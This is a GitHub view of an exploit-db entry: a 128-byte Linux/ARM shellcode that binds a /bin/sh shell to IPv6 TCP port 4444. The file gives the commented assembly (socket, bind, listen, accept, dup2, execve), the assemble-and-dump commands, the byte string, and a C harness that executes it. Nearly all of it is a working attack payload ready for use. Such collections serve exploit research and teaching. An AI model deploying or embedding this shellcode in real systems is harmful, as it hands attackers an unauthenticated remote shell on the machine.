forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy path45144.c
More file actions
137 lines (118 loc) · 3.69 KB
/
Copy path45144.c
File metadata and controls
137 lines (118 loc) · 3.69 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
/*
Title: Linux/ARM - IPv6 4444/TCP Bind Shellcode (128 Bytes)
Date: 2018-07-25
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $ cat bindshell-ipv6.s
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
.THUMB
// socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
mov r0, #10
mov r1, #1
eor r2, r2, r2
mov r7, #100
add r7, r7, #181
svc #1
// save fd
mov r4, r0
// bind(fd, &sockaddr, 28)
adr r1, struct_addr
// replace 0xff with NULL and set sin6_family to 0x0a (AF_INET6)
strb r2, [r1, #1]
// replace 1 with NULL and set sin6_flowinfo to NULL
str r2, [r1, #4]
// replace 1 with NULL and set sin6_addr to ::
str r2, [r1, #8]
str r2, [r1, #12]
str r2, [r1, #16]
str r2, [r1, #20]
// replace 1 with NULL and set sin6_scope_id to NULL
str r2, [r1, #24]
mov r2, #28
add r7, r7, #1
svc #1
// listen(host_sockid, 2)
mov r0, r4
mov r1, #2
add r7, r7, #2
svc #1
// accept(host_sockid, 0, 0)
mov r0, r4
eor r1, r1, r1
eor r2, r2, r2
add r7, r7, #1
svc #1
// save fd
mov r4, r0
// dup2(client_sockid, 0)
mov r7, #63
svc #1
// dup2(client_sockid, 1)
mov r0, r4
add r1, r1, #1
svc #1
// dup2(client_sockid, 2)
mov r0, r4
add r1, r1, #1
svc #1
// execve("/bin/sh", 0, 0)
eor r1, r1, r1
eor r2, r2, r2
adr r0, spawn
strb r2, [r0, #7]
mov r7, #11
svc #1
spawn:
.ascii "/bin/shA"
struct_addr:
.ascii "\x0a\xff" // sin6_family -> AF_INET6
.ascii "\x11\x5c" // sin6_port -> 4444
.byte 1,1,1,1 // sin6_flowinfo -> NULL
.byte 1,1,1,1 // sin6_addr -> ::
.byte 1,1,1,1
.byte 1,1,1,1
.byte 1,1,1,1
.byte 1,1,1,1 // sin6_scope_id -> NULL
pi@raspberrypi:~ $ as -o bindshell-ipv6.o bindshell-ipv6.s && ld -N -o bindshell-ipv6 bindshell-ipv6.o
pi@raspberrypi:~ $ objcopy -O binary bindshell-ipv6 bindshell-ipv6.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell-ipv6.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x0a\x20\x01\x21\x52\x40\x64\x27\xb5\x37\x01\xdf\x04\x1c\x13\xa1\x4a\x70\x4a\x60\x8a\x60\xca\x60\x0a\x61\x4a\x61\x8a\x61\x1c\x22\x01\x37\x01\xdf\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x40\x52\x40\x01\x37\x01\xdf\x04\x1c\x3f\x27\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x49\x40\x52\x40\x01\xa0\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x41\x0a\xff\x11\x5c\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01
*/
#include<stdio.h>
#include<string.h>
unsigned char sc[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x0a\x20\x01\x21\x52\x40\x64\x27"
"\xb5\x37\x01\xdf\x04\x1c\x13\xa1"
"\x4a\x70\x4a\x60\x8a\x60\xca\x60"
"\x0a\x61\x4a\x61\x8a\x61\x1c\x22"
"\x01\x37\x01\xdf\x20\x1c\x02\x21"
"\x02\x37\x01\xdf\x20\x1c\x49\x40"
"\x52\x40\x01\x37\x01\xdf\x04\x1c"
"\x3f\x27\x01\xdf\x20\x1c\x01\x31"
"\x01\xdf\x20\x1c\x01\x31\x01\xdf"
"\x49\x40\x52\x40\x01\xa0\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x41\x0a\xff\x11\x5c"
"\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01";
void main()
{
printf("Shellcode Length: %d\n", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}